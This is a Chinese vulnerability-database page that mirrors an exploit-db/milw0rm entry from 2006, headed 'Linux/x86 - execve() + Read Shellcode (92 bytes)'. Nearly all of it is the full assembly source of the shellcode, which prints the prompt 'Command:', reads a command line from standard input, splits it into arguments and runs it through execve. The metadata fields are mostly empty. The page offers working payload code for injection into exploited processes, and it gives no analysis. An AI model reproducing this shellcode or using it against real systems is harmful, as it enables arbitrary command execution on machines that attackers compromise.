Linux/x86 - execve() + Read Shellcode (92 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056080 漏洞类型
发布时间 2006-11-20 更新时间 2006-11-20
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13346
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#    XCHG Research Group
#    Linux/x86 execve read shellcode - 92 bytes
#    
#    
#    )--[ Writed by 0ut0fbound ]--(
#    
#    - http://outofbound.host.sk
#    - http://xchglabs.host.sk

.text

	.globl _start

_start:

# EAX = 0x04 -> syscall write()
	xorl %eax, %eax
	movb $0x4, %al
	xorl %ebx, %ebx
	inc %ebx
	pushl $0x20202020
	pushl $0x3a646e61
	pushl $0x6d6d6f43
	movl %esp, %ecx
	xorl %edx, %edx
	movb $0x9, %dl
	int $0x80 
	
# EAX = 0x03 -> syscall read()
	xorl %eax, %eax
	movb $0x3, %al
	xorl %ebx, %ebx
	xorl %edx, %edx
	movb $0x20, %dl
	subl %edx, %esp
	movl %esp, %ecx
	int $0x80 
	
# buffer[read(0, buffer, sizeof(buffer))] = 0;
	addl %eax, %ecx
	dec %ecx 
	movl %ebx, (%ecx)
	
	movl %esp, %ebx
	addl %eax, %ebx
	movl %eax, %ecx
	
	xorl %edx, %edx
	push %edx 
	
LOOP1: 
	movb (%ebx), %al
	cmp $0x20, %al
	jne CONT 
	xorb $0x20, (%ebx)
	inc %ebx 
	pushl %ebx 
	dec %ebx 
CONT: 
	dec %ebx 
loop LOOP1 
	
	push %ebx 
	
	movl %esp, %ecx
	xorl %eax, %eax
	movb $0xb, %al
	
	int $0x80 
	
# EAX = 0x01 -> syscall exit
	xorl %eax, %eax
	inc %al 
	xorl %ebx, %ebx
	int $0x80 

# milw0rm.com [2006-11-20]